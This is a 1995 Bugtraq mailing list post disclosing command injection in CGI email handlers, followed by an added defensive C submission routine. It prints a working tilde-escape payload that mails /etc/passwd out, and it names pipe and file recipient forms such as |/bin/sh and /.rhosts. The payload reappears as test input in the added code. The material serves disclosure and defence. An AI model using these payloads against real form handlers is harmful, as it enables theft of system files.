Bugtraq mailing list archives
More holes, was: Re: SECURITY HOLE: FormMail
From: ivo () nijenrode nl (Ivo)
Date: Sat, 5 Aug 1995 13:53:21 +0200
In message <199508042344.QAA20408 () Csli Stanford EDU> Christian Wettergren writes:

| Just to be helpful, the way to do it more safely, without massive
| need for checking is to build a complete mail message, including
| header, and hand that to "sendmail -t" which then reads the recipient
| information out of the constructed header. [Sendmail should of course
| be an invocation of smail or pp, not the BSD program of that name,
| given the history of problems that has had]

I suspect this still won't take care of emails to pipes or files, i.e. <|/bin/sh> or </.rhosts>; it is a legitimate, albeit unexpected, mail command going to sendmail. So unless these two modes are totally stripped out of the sendmail, there will exist a vulnerability there, won't it?
I've written an email-cgi package myself, and for this package I've used a simple smtp client written by Wietse Venema. I've been familiar with bugs like tilde-escapes etc. for a while, and this smtp client does not have any fancy switches, escapes, options etc. Ok, of course you should not use popen() or system() (C) or open/system (perl) (at least not without filtering out '|;' etc.), but fork combined with execve works fine and is secure.

You can find smtp.c in the wwwutils package at ftp://ftp.win.tue.nl/pub/infosystems/www/wwwutils.tar.gz or directly at ftp://ftp.nijenrode.nl/pub/people/ivo/smtp.c

Also (perhaps someone already reported this), Thomas Boutell's Email Handler (http://siva.cshl.org/email/index.html) seems to suffer from this problem. I've reported this a very long time ago to him, but it seems he hasn't fixed it. Thomas Boutell is maintainer of the WWW-FAQ, and he refers to his handler in it, so it *might* be that a lot of people are using it!

Here's a piece of code from email.c:

    sprintf(buf, "/usr/bin/mail %s", entries[recipientid].val);
    out = popen(buf, "w");
    fprintf(out, "Subject: %s\n", entries[subjectid].val);
    fprintf(out, "Reply-To: %s\n", entries[emailid].val);
    fprintf(out, "Supposedly-From: %s\n", entries[nameid].val);
    fprintf(out, "[This message was sent through the www-email gateway.]\n");
    fprintf(out, "--\n");
    fprintf(out, "%s\n", entries[contentid].val);
    pclose(out);

The popen() here doesn't seem to be insecure: the cgi first checks the recipient against a list of users which are defined in a local config file (whose location is hardcoded into the source). However, this program directly sends the entire message to /usr/bin/mail, including ~-escapes. I've been able to send myself, using this program, a copy of the passwd file by simply typing

    ~!/bin/mail ivo () nijenrode nl < /etc/passwd

in the message-entry of the form. This was on AIX 2.3.
Happy hacking,

Ivo
------------------------------------------------------------------------
Name:     Ivo van der Wijk            | It won't give up it wants me dead
Internet: ivo () nijenrode nl         | this goddamn noise inside my head
Aka:      www () nijenrode nl         |
IRC:      VladDrac                    | |\|||/|
URL:      http://www.nijenrode.nl/~ivo
------------------------------------------------------------------------
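The thread above makes three separate points: pass the recipient to the MTA through argv via fork()+execve() rather than through popen()/system(), keep shell and file "recipients" like |/bin/sh or /.rhosts away from the mailer by checking against a fixed list, and do not feed user text to a mailer that honours ~ escapes on its input. The following is an added example (written for this page; it is not Ivo's smtp.c, not Thomas Boutell's email.c, and not part of any post in the thread) that puts those three checks into one small C submission routine. It assumes an MTA front end at /usr/sbin/sendmail that accepts the recipient on the command line and understands -oi and a "--" option terminator (true of getopt-based front ends such as sendmail and Postfix's sendmail); the allowed-recipient table and all addresses are constructed stand-ins for the handler's local config file.

```c
/* Added example: validate CGI form fields, then hand the message to a
 * fixed MTA binary via fork()+execve().  No shell, no /usr/bin/mail.
 * Assumed: SENDMAIL path and its -oi / "--" handling; the recipient
 * table below is a constructed stand-in for the handler's config file. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define SENDMAIL "/usr/sbin/sendmail"

/* Constructed allow-list (example addresses, not real ones). */
static const char *allowed_recipients[] = {
    "webmaster@example.com", "ivo@example.com", NULL
};

/* Exact-match allow-list: "|/bin/sh", "/.rhosts" or ":include:" can
 * never become an argv entry, whatever the MTA would make of them. */
int recipient_allowed(const char *rcpt)
{
    for (const char **p = allowed_recipients; *p; p++)
        if (strcmp(rcpt, *p) == 0)
            return 1;
    return 0;
}

/* A header value must be one non-empty printable line; a CR or LF
 * would let the submitter append headers (Bcc:, extra To:) of their own. */
int header_value_ok(const char *v)
{
    if (*v == '\0')
        return 0;
    for (const unsigned char *p = (const unsigned char *)v; *p; p++)
        if (*p == '\r' || *p == '\n' || !isprint(*p))
            return 0;
    return 1;
}

/* Copy body to out, prefixing a space to any line that begins with '~'.
 * Only needed for a mailer that honours tilde escapes (~!cmd, ~r file)
 * on its standard input, as the AIX mail in the post did; sendmail does
 * not, but the line then also survives a later hop through such a mailer.
 * Returns bytes written, or -1 if out is too small. */
int neutralize_tilde(const char *body, char *out, size_t outlen)
{
    size_t n = 0;
    int at_line_start = 1;
    for (const char *p = body; *p; p++) {
        if (at_line_start && *p == '~') {
            if (n + 1 >= outlen) return -1;
            out[n++] = ' ';
        }
        if (n + 1 >= outlen) return -1;
        out[n++] = *p;
        at_line_start = (*p == '\n');
    }
    out[n] = '\0';
    return (int)n;
}

/* Build the message and pipe it to the MTA.  The recipient travels on
 * argv, not in a shell command line; "--" ends option parsing so even a
 * recipient starting with '-' could not become an MTA option; the child
 * gets a fixed environment instead of the CGI one.
 * Returns the MTA's exit status, or -1 on a validation or local failure. */
int send_mail(const char *to, const char *reply_to, const char *subject,
              const char *body)
{
    char clean[8192];
    int fd[2], status;
    pid_t pid;

    if (!recipient_allowed(to) || !header_value_ok(reply_to) ||
        !header_value_ok(subject))
        return -1;
    if (neutralize_tilde(body, clean, sizeof clean) < 0 || pipe(fd) < 0)
        return -1;
    if ((pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        char *argv[] = { "sendmail", "-oi", "--", (char *)to, NULL };
        char *envp[] = { "PATH=/usr/bin:/bin", NULL };
        dup2(fd[0], STDIN_FILENO);
        close(fd[0]);
        close(fd[1]);
        execve(SENDMAIL, argv, envp);
        _exit(127);
    }
    close(fd[0]);
    FILE *out = fdopen(fd[1], "w");
    if (!out) { close(fd[1]); waitpid(pid, &status, 0); return -1; }
    fprintf(out, "To: %s\nReply-To: %s\nSubject: %s\n", to, reply_to, subject);
    fprintf(out, "X-Mailer: www-email gateway (example)\n\n%s\n", clean);
    fclose(out);
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed form submission carrying the tilde escape from the post. */
    int rc = send_mail("ivo@example.com", "user@example.net", "test",
                       "hello\n~!/bin/mail ivo@example.com < /etc/passwd\n");
    printf("sendmail exit status: %d\n", rc);
    return rc == 0 ? 0 : 1;
}
```

Note that send_mail() still writes the recipient into a To: header the submitter never controls, so "sendmail -t" is not needed and the pipe/file recipient forms Ivo worries about never get a chance to be parsed out of user-supplied header text.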
Current thread:
- followup: local mail delivery, (continued)
- followup: local mail delivery der Mouse (Aug 03)
- Re: SECURITY HOLE: FormMail Christian Wettergren (Aug 03)
- PERL (was: Re: SECURITY HOLE: FormMail) VaX#n8 (Aug 07)
- Re: PERL (was: Re: SECURITY HOLE: FormMail) Philip Guenther (Aug 07)
- Guidelines for cgi-bin scripts Lee Silverman (Aug 08)
- Re: Guidelines for cgi-bin scripts Dave Andersen (Aug 08)
- Re: Guidelines for cgi-bin scripts Christian Wettergren (Aug 09)
- Re: SECURITY HOLE: FormMail Andrew Macpherson (Aug 03)
- Re: SECURITY HOLE: FormMail Christian Wettergren (Aug 04)
- Re: SECURITY HOLE: FormMail Neil Woods (Aug 05)
- More holes, was: Re: SECURITY HOLE: FormMail Ivo (Aug 05)
- My email handler, ~ escapes, etc. Tom (Aug 05)
- Simple CGI email handler, fixed Tom (Aug 05)
- Re: SECURITY HOLE: FormMail Christian Wettergren (Aug 04)
- Re: SECURITY HOLE: FormMail Andrew Macpherson (Aug 04)
- Re: SECURITY HOLE: FormMail Jukka Ukkonen (Aug 07)